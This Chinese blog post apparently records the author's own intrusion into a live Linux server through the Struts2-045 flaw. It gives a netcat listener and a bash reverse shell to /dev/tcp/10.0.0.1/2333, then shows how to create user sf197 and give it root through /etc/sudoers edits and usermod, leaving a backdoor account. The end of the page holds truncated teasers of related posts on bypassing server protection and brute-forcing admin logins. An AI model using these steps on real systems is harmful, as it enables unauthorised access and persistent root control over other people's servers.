記一次初步Linux提權

2022-05-30 13:33:11 字數 1806 閱讀 2858

前言、

提權這麼久了  還是頭一次提下linux的伺服器。。。

由於之前一直鑽研的win伺服器  要不是前些日子爆出來struts2-045漏洞

估計還沒時間接觸linux提權....

正文、

st2漏洞頁面

可以看到是root許可權的

接著就是想辦法新增乙個root組的使用者

由於新增使用者需要兩次重複輸入密碼(不像win伺服器直接net user)

所以nc**乙個shell到外網伺服器上

nc -vv -l -p 2333
在st2工具裡輸入

bash -i >& /dev/tcp/10.0.0.1/2333 0>&1
10.0.0.1是你的外網ip  2333是你監聽的埠

然後執行** 成功**上來後

新增使用者、

用adduser命令新增乙個普通使用者,命令如下:

#adduser sf197 //新增乙個名為sf197的使用者

#passwd sf197 //修改密碼

changing password for user sf197.

new unix password: //在這裡輸入新密碼

retype new unix password: //再次輸入新密碼

passwd: all authentication tokens updated successfully.//建立成功。

新增使用者到root組、方法一:修改 /etc/sudoers 檔案,找到下面一行,把前面的注釋(#)去掉

## allows people in group wheel to run all commands

%wheel    all=(all)    all

然後修改使用者,使其屬於root組(wheel),命令如下:

#usermod -g root sf197

修改完畢,現在可以用sf197帳號登入,然後用命令 su - ,即可獲得root許可權進行操作。

方法二:修改 /etc/sudoers 檔案,找到下面一行,在root下面新增一行,如下所示:

## allow root to run any commands anywhere

root    all=(all)     all

sf197   all=(all)     all

修改完畢,現在可以用sf197帳號登入,然後用命令 su - ,即可獲得root許可權進行操作。

成功新增完畢

用ssh協議連線伺服器  執行id返回root組!

記一次艱難的提權

記一次艱難的提權 資料報經過路由器就被拋棄了.初步判斷是路由器設定了acl表。掃瞄了一下目標伺服器,只開了80埠,伺服器作業系統是windows 2003.埠復用在2003上不管用。看來只有把iis停了再把45678埠轉到80埠上了。在c windows 目錄中寫了個1.bat 內容是copy c ...

記一次繞過寶塔提權

目標站點 72.243,首頁如下圖所示 簡單資訊收集得到以下資訊 thinkphp框架搭建的 可以利用遠端執行或者找找注入,本人習慣先從後台入手,url隨手加個admin得到後台 這裡沒有驗證碼復用,我們手動爆破下賬號密碼,這裡運氣不錯,管理賬號弱口令,直接進入後台 有了後台,getshell就相對...

一次 vulnhub靶機提權

kali linux vmware 橋接模式,複製網絡卡狀態 windows 物理機 檢視原始碼,得到 訪問 rambo.html kali 直接使用 掃出乙個目錄 johnnyrambo 這邊因為靶機是公用的,然後被人rm rf 了,所以我自己重新搭建了乙個 ip 位址改成 192.168.232...